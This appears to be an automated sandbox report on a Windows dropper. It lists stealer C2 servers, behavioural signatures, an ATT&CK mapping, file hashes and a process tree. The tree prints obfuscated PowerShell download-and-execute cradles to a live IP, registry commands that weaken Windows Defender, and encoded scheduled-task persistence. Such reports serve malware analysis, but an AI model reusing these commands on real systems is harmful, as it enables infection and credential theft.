Analysis

  • max time kernel
    4294122s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7-20220223-en
  • submitted
    10-03-2022 03:25

General

  • Target

    6a4b34f30116df6f9360612fa3841cbcfa378da53cbe04d55a56ea1eca823930.exe

  • Size

    3.5MB

  • MD5

    fa71fd47496dbdaf60a10997b33f3354

  • SHA1

    3dd0dbfd044afe884961dc16e6fa97656a60346f

  • SHA256

    6a4b34f30116df6f9360612fa3841cbcfa378da53cbe04d55a56ea1eca823930

  • SHA512

    929730416a2e5392828fbbfd4f5529326e8d40d73f069d0903d71688a3f057dc8e1f28ee9bb9f350abefb37e2ad948cabf19b994044fa11d4a20bb3aecc06aad

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.192/-RED/RED.oo

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.192/-RED/NAN.oo

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.192/-RED/NON.oo

Extracted

Family

redline

C2

45.67.231.23:37676

Attributes
  • auth_value

    5f050409d5f5a18aebb1db23072cf9f6

Extracted

Family

redline

Botnet

Cana

C2

176.111.174.254:56328

Extracted

Family

vidar

Version

39.4

Botnet

933

C2

https://sergeevih43.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

Ani

C2

detuyaluro.xyz:80

Extracted

Family

vidar

Version

50.6

Botnet

937

C2

https://mas.to/@s4msalo

https://koyu.space/@samsa2l

Attributes
  • profile_id

    937

Extracted

Family

redline

Botnet

fdfsdf

C2

86.107.197.196:63065

Attributes
  • auth_value

    49c341b88f13528ba52befa3c6ca7ebb

Extracted

Family

redline

Botnet

Travis

C2

5.182.5.22:33809

Attributes
  • auth_value

    6fa3251b9d70327e7d1e5851c226af23

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • OnlyLogger

    A tiny loader that uses IPLogger to get its payload.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 10 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • OnlyLogger Payload 2 IoCs
  • Vidar Stealer 3 IoCs
  • ASPack v2.12-2.42 14 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 31 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 39 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\6a4b34f30116df6f9360612fa3841cbcfa378da53cbe04d55a56ea1eca823930.exe
    "C:\Users\Admin\AppData\Local\Temp\6a4b34f30116df6f9360612fa3841cbcfa378da53cbe04d55a56ea1eca823930.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:824
    • C:\Users\Admin\AppData\Local\Temp\7zS833C8046\setup_install.exe
      "C:\Users\Admin\AppData\Local\Temp\7zS833C8046\setup_install.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:964
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sahiba_1.exe
        3⤵
        • Loads dropped DLL
        PID:668
        • C:\Users\Admin\AppData\Local\Temp\7zS833C8046\sahiba_1.exe
          sahiba_1.exe
          4⤵
          • Executes dropped EXE
          PID:1248
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sahiba_2.exe
        3⤵
        • Loads dropped DLL
        PID:696
        • C:\Users\Admin\AppData\Local\Temp\7zS833C8046\sahiba_2.exe
          sahiba_2.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Checks SCSI registry key(s)
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          PID:272
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sahiba_3.exe
        3⤵
        • Loads dropped DLL
        PID:1736
        • C:\Users\Admin\AppData\Local\Temp\7zS833C8046\sahiba_3.exe
          sahiba_3.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:1416
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1416 -s 1004
            5⤵
            • Loads dropped DLL
            • Program crash
            PID:1748
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sahiba_9.exe
        3⤵
        • Loads dropped DLL
        PID:1920
        • C:\Users\Admin\AppData\Local\Temp\7zS833C8046\sahiba_9.exe
          sahiba_9.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          PID:596
          • C:\Users\Admin\AppData\Local\Temp\7zS833C8046\sahiba_9.exe
            C:\Users\Admin\AppData\Local\Temp\7zS833C8046\sahiba_9.exe
            5⤵
            • Executes dropped EXE
            PID:1652
          • C:\Users\Admin\AppData\Local\Temp\7zS833C8046\sahiba_9.exe
            C:\Users\Admin\AppData\Local\Temp\7zS833C8046\sahiba_9.exe
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:280
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sahiba_8.exe
        3⤵
        • Loads dropped DLL
        PID:972
        • C:\Users\Admin\AppData\Local\Temp\7zS833C8046\sahiba_8.exe
          sahiba_8.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:1220
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sahiba_7.exe
        3⤵
        • Loads dropped DLL
        PID:1196
        • C:\Users\Admin\AppData\Local\Temp\7zS833C8046\sahiba_7.exe
          sahiba_7.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Modifies system certificate store
          PID:1684
          • C:\Users\Admin\Documents\61UBU8lsqdQE9hYeYmi7WmOE.exe
            "C:\Users\Admin\Documents\61UBU8lsqdQE9hYeYmi7WmOE.exe"
            5⤵
            • Executes dropped EXE
            PID:2096
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c taskkill /im "61UBU8lsqdQE9hYeYmi7WmOE.exe" /f & erase "C:\Users\Admin\Documents\61UBU8lsqdQE9hYeYmi7WmOE.exe" & exit
              6⤵
                PID:2456
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /im "61UBU8lsqdQE9hYeYmi7WmOE.exe" /f
                  7⤵
                  • Kills process with taskkill
                  PID:2716
            • C:\Users\Admin\Documents\DAZWpc2LB_t4YJugWwbaZw3K.exe
              "C:\Users\Admin\Documents\DAZWpc2LB_t4YJugWwbaZw3K.exe"
              5⤵
              • Executes dropped EXE
              PID:2116
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c taskkill /im DAZWpc2LB_t4YJugWwbaZw3K.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\DAZWpc2LB_t4YJugWwbaZw3K.exe" & del C:\ProgramData\*.dll & exit
                6⤵
                  PID:2264
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /im DAZWpc2LB_t4YJugWwbaZw3K.exe /f
                    7⤵
                    • Kills process with taskkill
                    PID:2908
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout /t 6
                    7⤵
                    • Delays execution with timeout.exe
                    PID:2428
              • C:\Users\Admin\Documents\mofwxgHB4IP_xKGlHDC4oBYX.exe
                "C:\Users\Admin\Documents\mofwxgHB4IP_xKGlHDC4oBYX.exe"
                5⤵
                • Executes dropped EXE
                • Modifies system certificate store
                • Suspicious use of AdjustPrivilegeToken
                PID:2128
                • C:\Windows\SysWOW64\cmd.exe
                  cmd.exe /c taskkill /f /im chrome.exe
                  6⤵
                    PID:2900
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /f /im chrome.exe
                      7⤵
                      • Kills process with taskkill
                      PID:2964
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2128 -s 1520
                    6⤵
                    • Program crash
                    PID:2220
                • C:\Users\Admin\Documents\ND_IgBaGbR34ZYFwVT7rn9Rj.exe
                  "C:\Users\Admin\Documents\ND_IgBaGbR34ZYFwVT7rn9Rj.exe"
                  5⤵
                  • Executes dropped EXE
                  • Checks BIOS information in registry
                  • Checks whether UAC is enabled
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2156
                • C:\Users\Admin\Documents\5aLeSpINqCKjJbAnS_5ImMHg.exe
                  "C:\Users\Admin\Documents\5aLeSpINqCKjJbAnS_5ImMHg.exe"
                  5⤵
                  • Executes dropped EXE
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  PID:2320
                • C:\Users\Admin\Documents\Ua3pIDN45J3XPvSfnauKcjn1.exe
                  "C:\Users\Admin\Documents\Ua3pIDN45J3XPvSfnauKcjn1.exe"
                  5⤵
                  • Executes dropped EXE
                  PID:2312
                  • C:\Users\Admin\AppData\Local\Temp\7zS2D48.tmp\Install.exe
                    .\Install.exe
                    6⤵
                      PID:1768
                      • C:\Users\Admin\AppData\Local\Temp\7zS66DE.tmp\Install.exe
                        .\Install.exe /S /site_id "525403"
                        7⤵
                          PID:3040
                          • C:\Windows\SysWOW64\forfiles.exe
                            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                            8⤵
                              PID:272
                              • C:\Windows\SysWOW64\cmd.exe
                                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                9⤵
                                  PID:1168
                                  • \??\c:\windows\SysWOW64\reg.exe
                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                    10⤵
                                      PID:2408
                                    • \??\c:\windows\SysWOW64\reg.exe
                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                      10⤵
                                        PID:2232
                                  • C:\Windows\SysWOW64\forfiles.exe
                                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                    8⤵
                                      PID:1708
                                      • C:\Windows\SysWOW64\cmd.exe
                                        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                        9⤵
                                          PID:1344
                                          • \??\c:\windows\SysWOW64\reg.exe
                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                            10⤵
                                              PID:2440
                                            • \??\c:\windows\SysWOW64\reg.exe
                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                              10⤵
                                                PID:2108
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /CREATE /TN "gbRprhoAp" /SC once /ST 02:40:21 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                            8⤵
                                            • Creates scheduled task(s)
                                            PID:2776
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /run /I /tn "gbRprhoAp"
                                            8⤵
                                              PID:2484
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              schtasks /DELETE /F /TN "gbRprhoAp"
                                              8⤵
                                                PID:2432
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 03:28:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\UQWOxlk.exe\" j6 /site_id 525403 /S" /V1 /F
                                                8⤵
                                                • Creates scheduled task(s)
                                                PID:2144
                                        • C:\Users\Admin\Documents\1EFVKteLzlhnCYvQhBVcIO8i.exe
                                          "C:\Users\Admin\Documents\1EFVKteLzlhnCYvQhBVcIO8i.exe"
                                          5⤵
                                          • Executes dropped EXE
                                          PID:2304
                                        • C:\Users\Admin\Documents\ceOJ5J4ZFax_D0HzMNPskwTj.exe
                                          "C:\Users\Admin\Documents\ceOJ5J4ZFax_D0HzMNPskwTj.exe"
                                          5⤵
                                          • Executes dropped EXE
                                          PID:2292
                                        • C:\Users\Admin\Documents\PYCwGQ29NZxU5n_cZXj8Jxpl.exe
                                          "C:\Users\Admin\Documents\PYCwGQ29NZxU5n_cZXj8Jxpl.exe"
                                          5⤵
                                          • Executes dropped EXE
                                          PID:2284
                                        • C:\Users\Admin\Documents\lINhrnCT7zJWPLY1DsC3bty7.exe
                                          "C:\Users\Admin\Documents\lINhrnCT7zJWPLY1DsC3bty7.exe"
                                          5⤵
                                          • Executes dropped EXE
                                          PID:2420
                                        • C:\Users\Admin\Documents\Ju0BWFYeoQnvE_bCm6PqI3ym.exe
                                          "C:\Users\Admin\Documents\Ju0BWFYeoQnvE_bCm6PqI3ym.exe"
                                          5⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetWindowsHookEx
                                          PID:2476
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.192/-RED/RED.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}','');I`E`X $TC|I`E`X
                                            6⤵
                                              PID:2992
                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                7⤵
                                                  PID:2808
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.192/-RED/NAN.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}','');I`E`X $TC|I`E`X
                                                6⤵
                                                  PID:3016
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.192/-RED/NON.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}','');I`E`X $TC|I`E`X
                                                  6⤵
                                                    PID:3056
                                                • C:\Users\Admin\Documents\A0xjpgjunVwPCcdeOnKFY870.exe
                                                  "C:\Users\Admin\Documents\A0xjpgjunVwPCcdeOnKFY870.exe"
                                                  5⤵
                                                  • Executes dropped EXE
                                                  PID:2508
                                                • C:\Users\Admin\Documents\ktlnZEQ7piD_O3bOle1VgXfO.exe
                                                  "C:\Users\Admin\Documents\ktlnZEQ7piD_O3bOle1VgXfO.exe"
                                                  5⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  PID:2500
                                                • C:\Users\Admin\Documents\AfIkI0HDmxQN4_OaQVWJ05Ju.exe
                                                  "C:\Users\Admin\Documents\AfIkI0HDmxQN4_OaQVWJ05Ju.exe"
                                                  5⤵
                                                  • Executes dropped EXE
                                                  PID:2564
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
                                                    6⤵
                                                      PID:2728
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd
                                                        7⤵
                                                          PID:2836
                                                          • C:\Windows\SysWOW64\find.exe
                                                            find /I /N "bullguardcore.exe"
                                                            8⤵
                                                              PID:2876
                                                            • C:\Windows\SysWOW64\tasklist.exe
                                                              tasklist /FI "imagename eq BullGuardCore.exe"
                                                              8⤵
                                                              • Enumerates processes with tasklist
                                                              PID:2868
                                                            • C:\Windows\SysWOW64\find.exe
                                                              find /I /N "psuaservice.exe"
                                                              8⤵
                                                                PID:2896
                                                              • C:\Windows\SysWOW64\tasklist.exe
                                                                tasklist /FI "imagename eq PSUAService.exe"
                                                                8⤵
                                                                • Enumerates processes with tasklist
                                                                PID:1168
                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                findstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif
                                                                8⤵
                                                                  PID:1572
                                                                • C:\Windows\SysWOW64\waitfor.exe
                                                                  waitfor /t 5 jFjyKdbHiNcpqGHLaDXhhIXfDT
                                                                  8⤵
                                                                    PID:2164
                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
                                                                    Accostarmi.exe.pif N
                                                                    8⤵
                                                                      PID:2112
                                                              • C:\Users\Admin\Documents\NUBxQYB3sxm5ekcaAkqBGxlp.exe
                                                                "C:\Users\Admin\Documents\NUBxQYB3sxm5ekcaAkqBGxlp.exe"
                                                                5⤵
                                                                • Executes dropped EXE
                                                                PID:2540
                                                                • C:\Users\Admin\Documents\NUBxQYB3sxm5ekcaAkqBGxlp.exe
                                                                  C:\Users\Admin\Documents\NUBxQYB3sxm5ekcaAkqBGxlp.exe
                                                                  6⤵
                                                                    PID:2136
                                                                • C:\Users\Admin\Documents\GNMMVrXeBSoKfZnOnxFysRAF.exe
                                                                  "C:\Users\Admin\Documents\GNMMVrXeBSoKfZnOnxFysRAF.exe"
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  PID:2532
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c sahiba_6.exe
                                                              3⤵
                                                              • Loads dropped DLL
                                                              PID:988
                                                              • C:\Users\Admin\AppData\Local\Temp\7zS833C8046\sahiba_6.exe
                                                                sahiba_6.exe
                                                                4⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1396
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c sahiba_5.exe
                                                              3⤵
                                                              • Loads dropped DLL
                                                              PID:1676
                                                              • C:\Users\Admin\AppData\Local\Temp\7zS833C8046\sahiba_5.exe
                                                                sahiba_5.exe
                                                                4⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                PID:860
                                                                • C:\Users\Admin\AppData\Local\Temp\is-UAHN1.tmp\sahiba_5.tmp
                                                                  "C:\Users\Admin\AppData\Local\Temp\is-UAHN1.tmp\sahiba_5.tmp" /SL5="$70154,506127,422400,C:\Users\Admin\AppData\Local\Temp\7zS833C8046\sahiba_5.exe"
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  PID:820
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c sahiba_4.exe
                                                              3⤵
                                                              • Loads dropped DLL
                                                              PID:1496
                                                              • C:\Users\Admin\AppData\Local\Temp\7zS833C8046\sahiba_4.exe
                                                                sahiba_4.exe
                                                                4⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                PID:1488
                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  PID:856
                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:528
                                                        • C:\Windows\system32\taskeng.exe
                                                          taskeng.exe {5ABF4A43-1BE8-4EE3-97BD-026B9A628971} S-1-5-21-1405931862-909307831-4085185274-1000:GZAATBZA\Admin:Interactive:[1]
                                                          1⤵
                                                            PID:2260
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                              2⤵
                                                                PID:2780

                                                            Network

                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                            Execution

                                                            Scheduled Task

                                                            1
                                                            T1053

                                                            Persistence

                                                            Modify Existing Service

                                                            1
                                                            T1031

                                                            Scheduled Task

                                                            1
                                                            T1053

                                                            Privilege Escalation

                                                            Scheduled Task

                                                            1
                                                            T1053

                                                            Defense Evasion

                                                            Modify Registry

                                                            2
                                                            T1112

                                                            Disabling Security Tools

                                                            1
                                                            T1089

                                                            Virtualization/Sandbox Evasion

                                                            1
                                                            T1497

                                                            Install Root Certificate

                                                            1
                                                            T1130

                                                            Credential Access

                                                            Credentials in Files

                                                            1
                                                            T1081

                                                            Discovery

                                                            Query Registry

                                                            3
                                                            T1012

                                                            Virtualization/Sandbox Evasion

                                                            1
                                                            T1497

                                                            System Information Discovery

                                                            4
                                                            T1082

                                                            Peripheral Device Discovery

                                                            1
                                                            T1120

                                                            Process Discovery

                                                            1
                                                            T1057

                                                            Collection

                                                            Data from Local System

                                                            1
                                                            T1005

                                                            Command and Control

                                                            Web Service

                                                            1
                                                            T1102

                                                            Replay Monitor

                                                            Loading Replay Monitor...

                                                            Downloads

                                                            • C:\Users\Admin\AppData\Local\Temp\7zS833C8046\libcurl.dll
                                                              MD5

                                                              d09be1f47fd6b827c81a4812b4f7296f

                                                              SHA1

                                                              028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                              SHA256

                                                              0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                              SHA512

                                                              857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                            • C:\Users\Admin\AppData\Local\Temp\7zS833C8046\libcurlpp.dll
                                                              MD5

                                                              e6e578373c2e416289a8da55f1dc5e8e

                                                              SHA1

                                                              b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                              SHA256

                                                              43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                              SHA512

                                                              9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                            • C:\Users\Admin\AppData\Local\Temp\7zS833C8046\libgcc_s_dw2-1.dll
                                                              MD5

                                                              9aec524b616618b0d3d00b27b6f51da1

                                                              SHA1

                                                              64264300801a353db324d11738ffed876550e1d3

                                                              SHA256

                                                              59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                              SHA512

                                                              0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                            • C:\Users\Admin\AppData\Local\Temp\7zS833C8046\libstdc++-6.dll
                                                              MD5

                                                              5e279950775baae5fea04d2cc4526bcc

                                                              SHA1

                                                              8aef1e10031c3629512c43dd8b0b5d9060878453

                                                              SHA256

                                                              97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                              SHA512

                                                              666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                            • C:\Users\Admin\AppData\Local\Temp\7zS833C8046\libwinpthread-1.dll
                                                              MD5

                                                              1e0d62c34ff2e649ebc5c372065732ee

                                                              SHA1

                                                              fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                              SHA256

                                                              509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                              SHA512

                                                              3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                            • C:\Users\Admin\AppData\Local\Temp\7zS833C8046\sahiba_1.exe
                                                              MD5

                                                              151ac4868889bf34489fec00289e2b68

                                                              SHA1

                                                              2e7b27cf334c64b0b28c5ca5742b4d920fa0434b

                                                              SHA256

                                                              0c1132ab8af5e8649d2b2402f57d99447b4e798db85529926cb1290c50a342b0

                                                              SHA512

                                                              e1cae09dff04003ac5c411417ea4823031fec189274762369c07b8505d1cef45404e91cff03039dac41c47f1468675f4f7262716e81e92051db5a8fd52439bb9

                                                            • C:\Users\Admin\AppData\Local\Temp\7zS833C8046\sahiba_1.txt
                                                              MD5

                                                              151ac4868889bf34489fec00289e2b68

                                                              SHA1

                                                              2e7b27cf334c64b0b28c5ca5742b4d920fa0434b

                                                              SHA256

